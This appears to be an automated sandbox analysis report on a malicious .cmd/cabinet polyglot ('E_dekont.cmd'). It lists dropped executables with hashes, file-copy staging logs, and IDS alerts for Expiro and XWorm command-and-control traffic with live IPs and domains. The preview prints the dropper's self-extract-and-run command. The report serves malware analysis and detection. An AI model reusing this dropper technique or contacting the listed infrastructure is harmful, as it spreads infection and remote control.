Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2075136
Entropy (8bit):6.736615937275442
Encrypted:false
SSDEEP:49152:DPK86JYTerDjfJ2313e1mP1MdnUeDmg27RnWGj:SD527BWG
MD5:516BE630FCBECAF32B699CEB132A7E80
SHA1:9C3A1B95D0B48F6D6E1012C5F92E56A6774B094D
SHA-256:8277372EA0C973188EE212FF218736FE524B7602AFF229339B2165CFBDD9BF2C
SHA-512:6B66C9FEF0F2455B33D14C96202024AAF1C7745D2888C19EB06BAE6989F20065F33C7290B39CEABF955DAC77525F481852B88DFC66285169E806F1A902B5EE98
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1225728
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.163337410723834
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:TEP3R61Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Y61sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:C735DBF5B2240108A94A4D6FB664CF20
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EC618C58D58540E4752B3A4E3ADFDA62471DB693
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F56188F42C1068C02725F16A03B21B11CCE4B48C7294C7ED3E2BF69573C5B113
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1C455034DAE4D4332EA0AE91FA995079B1ACCB17089AEC35E548D9B1A5E9575F91BCBA264A196BA60CD6283AB81A6108C8C848458BC032CCD97DCAC476043042
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.986302848115097
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:uRnUjm02s1Kb4sU08SHQS51yOmpghNPEUCyAs:uRoBm468gLyZOEUCy5
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:690FE012825EC10A3F29CBF2B475F168
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C379C65CC4493055941772DB386809B46E2DCF6C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A0AD4FFD94E0945C3399280D88C55BFC744D2F04C56FE1A23897226C5F84EF9F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:5C7BF6ED130523418605DE9F18861681D9D5D367F3DE531E8BD647C84D8073D2C9FA9CB5D58E76A527508911CD87E6B084FF90CAE95361B814690116D88339F1
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1278464
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.142999227020195
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:rjkyOXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:rIyOsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:7C2A7829306AFD07E0A7BEE6B5203F55
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:120A5E296E8813186C1CBBC04886E55E651D7D84
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C633538A1704B93A5EB014C91C7ADA09A0A122989199FED1E2C74DC915D1510E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:7B44CA384D31F8850F219345121EF8D3FC4487C1A31BAA596C15040AC91429A62110171FEB6E63F8355B4853F5BB6C2257BD079B70B619B5B6A75C857D658A13
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1199616
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.0839062715811245
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:A4DIXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PIsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:66648D55AF2A2DD37FD39F47097A8BE4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:B5BCCBF131885498A6D14F85BEDE01966317B777
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BD290A56C9CADF695D7381543BF212E7857AEDDE9A70595354E99F225B0644B1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:17554917BEF3F419A4ED7F41A133EEEE0A833A65F15AB478F742E3AF2BEF4DBCCC46CEEDB3578EDFC0E45003F23050D8E916D3AA956F76A0C7205F73133BC469
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1146880
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.027585232381334
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:b9UXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:xUsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:16010E8846BCE27721A406159D8AE296
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C7FE933FEF534FC24C8104BC0EB9D0202DF65B8B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8E0B0499751277CAE9D48D58C448F3316AE4F46D7C56BACA85D62ABED8F94602
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CE75BF6847A4565774312C8D087B4FB8B27816C4B5475A6EBB7524D5E4DD014CDF0116D27C2E4B6812A883CA2DCDBDF0F7C8725E062837559E798573FC03DB0F
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5161984
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.256982526436889
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:2CLZqizFGeZV8ppBcq+NFabvy5FEz9AGknGD527BWG:9LDzFGmVWQq+NFarCFUInGVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:562E3D1B4763C6BB49E30F1EBC5A75AB
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:116D5D403459D8D489DE3B2C3343B5E7575DF547
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:069445562782473810BDAEF038872663BFC7E65812B55585A2E19B72B16DF3E7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:045E190F03B150B1F645052BDA6B38FA230EDCDF5CD371497CAD22B3375D00CEDE0646E20A26F2B35C724B5C125EF05BCFDF93A94858D7C97AC9084FBA267704
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1303552
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.171615991915963
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:xZ0FxT1UoYr99GdcpKlsqjnhMgeiCl7G0nehbGZpbD:fwWcZDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:1F5F8B127B48BA1373FB2B0316C0F221
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:09B1CCA2CD09356D2894E7BAE86B97AC4A03FE77
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4EC402C7C73E94DFD4A464DF0234B03FEAF77D87FE4E6AC097D2FB23FF235009
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:3B92822722DAB5B612D991F3C382F295A9D4DF72D23AD677DE0ED8E772658C3D0DB4FB04BF6CC5FB036BF7A470A7B31CD150ED7886F62E761DFBD69A6D2CD307
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1339392
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2693290391473075
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:QyoKo2fRple9pWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:QyocJApWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:E04D0C5CE55DF784DD252F53D44EC659
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E5E6223B282DBA5B448B0A57143E02C0EFED61CD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:0373A8A02CFAA32C5B6B3E491F6A2A7391EF240B0709D2B8DB68592F2EC3A1A6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:50DABC491EBC15F167B1B5A322BDD6ECD985040492040BCB649FAE92F8C0FCD709917CB97F4F430E4BA665B0A7B5C9DE4E1D27F6D740EABB57D4546E4915F9B8
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2164736
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.062075526180567
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:PWcnPqQUGpuphwC0DNLDpaRFXrLuWGMKCIK+Dmg27RnWGj:30zuNI6D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:0090C8857C6EB421F6CB1943A3002648
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6E0306098A7EA3F46E27ACF2BCB66C6F73382878
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:013CDAA9786CCB68D47FC064D6C17D3ECA10E2F9C68BC02F0EA2568C5234D4E1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EC279AEF9FF390E2D55293DED270605FC1A8BC6849254CDDDC7BAE4C90AFCFE74D304C777C08C3C603C1B2B3881CB0558E63B4C4E3BB1D66BD19F77875B353AA
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.09987924461109185
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:sMa3l/k/uMclF6vMclFq5zqLNOn+SkUeYDwDzymDj:sMaV/kqF69Fq5zCO+pawHym/
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:6D6F9B4A940AB2D001D21578C5887BC3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:25EC27799338FDC5F64FD684CB8C872592587910
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:20FC299C83E86E9A05D20741F6FA8984A47D5F379C913FCCA25B6621E0E2FDA1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1653F2654A4E8687372FA596FF27C96387B04686DBA23FD3793B7DAE5B86E4A496B36D3BA19FD5F053F62D4CFDB5622C362D4D1D946F87B31663C9DAD0B0ABFE
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.1013960852819274
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:Vl6GHg3l/k/uMclF6vMclFq5zqv+NMu3n+SkUeYDwDzyMmpb:Vl6GAV/kqF69Fq5zFX+pawHy1
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:01EBD89DB1CD26286F885775CA5CDD55
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:2A8B7F4302257FBE25CD390AC577A82E89764D0B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E250AFCFE91D059B189CB5ADC476D0B8A24E7B1245D6B04AA6B6C0E97AFCA98A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B770B34353FA0A1AC00578EA05E5D980AD4BB2CEAD181924F1823C0887A3BDC35434E6AFEACB8C454E55B63A68F0D56BF23FB32B63EEAC101A31529BA345F559
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.09883303378560836
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:uRz3Nk/uMclF6vMclFq5zqIANIn+SkUeYDwDzy7r:u59kqF69Fq5zdwI+pawHy/
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:ED98A3C721CC3105E391EAB4ECF7DF25
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:68C196F8A2C6D7F3A7699E46985C26040154D6FE
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:90FF6065184A74EC31148BB3E8AB459FC0151CAE1B4DDC703EE8B533099AC263
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CADA33E9E59F8734450520146AC2C7B4EFA8919215BC2C263CD5A4F356B4098D67B2F6E342C3CC748F701676A3231C90FB3020B8358DA2082483711C30948610
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):592
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.643060201679602
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:qQ/xTzfeSbZ7u0wxDDDDDDDDjCaY5h5aYAlXlTB8NGNJ:X/xTzfp7u0wQakh5azXlt8Nc
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:E599B14F81F9AC80BE28BE42DA97FCBC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:26558C53D68A1702001285F679AE5913F09ACA26
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C36879C37825641187D27CBA7028314E0D4062DFA6FCA347ADF035AB2F6EDD41
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:48A6B3A7F25A338FE0F56D3AC5617015D6E4A2A35A41F8A1A14149EC6429C650DC98A6F101DB0F4E747D31C3F92C0AA1EE3FB7582CE0D031EF3CB62DEE530B89
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\AppData\Local\Temp\x.exe...Destination File: C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x100c00 (1051648) (1 MB)....Total bytes written = 0x101000 (1052672) (1 MB).......Operation completed successfully in 0.94 seconds.....

Process:C:\Windows\SysWOW64\esentutl.exe
File Type:ASCII text, with CRLF, CR line terminators
Category:dropped
Size (bytes):560
Entropy (8bit):4.532578488470501
Encrypted:false
SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNX:/p4xT5cp7u0wQakB4aV4t8Nq
MD5:3590356B24CBB2F8E508903A82A31479
SHA1:229AF4E5E706A72DD87578DB5148486F39241E86
SHA-256:FDFB0F4095DF37BD607F769AC1D645CAED248BC4E251E8B0E76143004F6D7C2A
SHA-512:FEB02635FD1E447889750296757A6A8ABEA231762F2C4A70ED18A475468975A6F57B88105E7EE6C7A7DC66E6C30E8FC5569FD096BA72368BB177C0723DDECF0D
Malicious:false
Reputation:unknown
Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.78 seconds.....

File type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 33 datablocks, 0 compression
Entropy (8bit):6.894223141204619
TrID:
• Microsoft Cabinet Archive (8008/1) 99.91%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
File name:E_dekont.cmd
File size:1'052'051 bytes
MD5:79c1ba6106f6cb367fc280abae110506
SHA1:2656bbcf91b0dd2261a5b9fb44e41539931243ac
SHA256:09ed171d42a56e9db61a78259695d8d3b2e623348ed2d24dc58745e134997df6
SHA512:2bc16a585d95bd18314bd7b6aae80a41c859f75735a0b2a9f2d0b643bdcb8f3269363e3eefc73677de21478a93dde8469deb1262508d7f3d6d01ca9f4d056ab3
SSDEEP:24576:GVblKbApOPxyGDvZSAIDX8tHHxbV13los:GV5mBZSAIY5RX
TLSH:50259D2635D55A34D133127A6807979C961C3D313E25A06F7DF19F3CFA24A843A2AFA3
File Content Preview:MSCF............u.......................!.......cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe".................. .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und
Icon Hash:9686878b929a9886

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-01T08:23:16.871535+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49707 | 188.114.97.3 | 443 | TCP
2024-11-01T08:23:23.955756+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.8 | 49708 | 54.244.188.177 | 80 | TCP
2024-11-01T08:23:23.960930+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.8 | 49708 | TCP
2024-11-01T08:23:23.960930+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.8 | 49708 | TCP
2024-11-01T08:23:28.532789+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.8 | 49711 | TCP
2024-11-01T08:23:28.532789+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.8 | 49711 | TCP
2024-11-01T08:23:28.543237+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.8 | 65093 | 1.1.1.1 | 53 | UDP
2024-11-01T08:23:29.931761+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.8 | 61527 | 1.1.1.1 | 53 | UDP
2024-11-01T08:23:31.944441+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.8 | 51366 | 1.1.1.1 | 53 | UDP
2024-11-01T08:23:32.190942+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.8 | 49716 | TCP
2024-11-01T08:23:34.433751+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.8 | 60770 | 1.1.1.1 | 53 | UDP
2024-11-01T08:23:36.310447+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.8 | 49731 | TCP
2024-11-01T08:23:36.310447+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.141.10.107 | 80 | 192.168.2.8 | 49731 | TCP
2024-11-01T08:23:40.212666+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 62.60.190.120 | 7923 | 192.168.2.8 | 49727 | TCP
2024-11-01T08:23:40.212666+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 62.60.190.120 | 7923 | 192.168.2.8 | 49727 | TCP
2024-11-01T08:23:45.746051+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.8 | 49727 | 62.60.190.120 | 7923 | TCP
2024-11-01T08:23:46.016418+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 62.60.190.120 | 7923 | 192.168.2.8 | 49727 | TCP
2024-11-01T08:23:46.018377+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49727 | 62.60.190.120 | 7923 | TCP
2024-11-01T08:23:55.277577+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 34.246.200.160 | 80 | 192.168.2.8 | 49745 | TCP
2024-11-01T08:23:55.277577+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 34.246.200.160 | 80 | 192.168.2.8 | 49745 | TCP
2024-11-01T08:23:57.508298+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 62.60.190.120 | 7923 | 192.168.2.8 | 49727 | TCP
2024-11-01T08:23:57.510611+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49727 | 62.60.190.120 | 7923 | TCP
2024-11-01T08:23:58.310559+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 13.251.16.150 | 80 | 192.168.2.8 | 49749 | TCP
2024-11-01T08:23:58.310559+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 13.251.16.150 | 80 | 192.168.2.8 | 49749 | TCP
2024-11-01T08:24:00.925861+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 47.129.31.212 | 80 | 192.168.2.8 | 49752 | TCP
2024-11-01T08:24:00.925861+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 47.129.31.212 | 80 | 192.168.2.8 | 49752 | TCP
2024-11-01T08:24:00.958134+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 35.164.78.200 | 80 | 192.168.2.8 | 49753 | TCP
2024-11-01T08:24:00.958134+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 35.164.78.200 | 80 | 192.168.2.8 | 49753 | TCP
2024-11-01T08:24:09.007426+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 62.60.190.120 | 7923 | 192.168.2.8 | 49727 | TCP
2024-11-01T08:24:09.009008+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49727 | 62.60.190.120 | 7923 | TCP
2024-11-01T08:24:09.222987+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.208.156.248 | 80 | 192.168.2.8 | 49771 | TCP
2024-11-01T08:24:09.222987+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.208.156.248 | 80 | 192.168.2.8 | 49771 | TCP
2024-11-01T08:24:10.211554+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 62.60.190.120 | 7923 | 192.168.2.8 | 49727 | TCP
2024-11-01T08:24:10.211554+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 62.60.190.120 | 7923 | 192.168.2.8 | 49727 | TCP
2024-11-01T08:24:12.472558+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.8 | 49776 | TCP
2024-11-01T08:24:13.550781+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.246.231.120 | 80 | 192.168.2.8 | 49779 | TCP
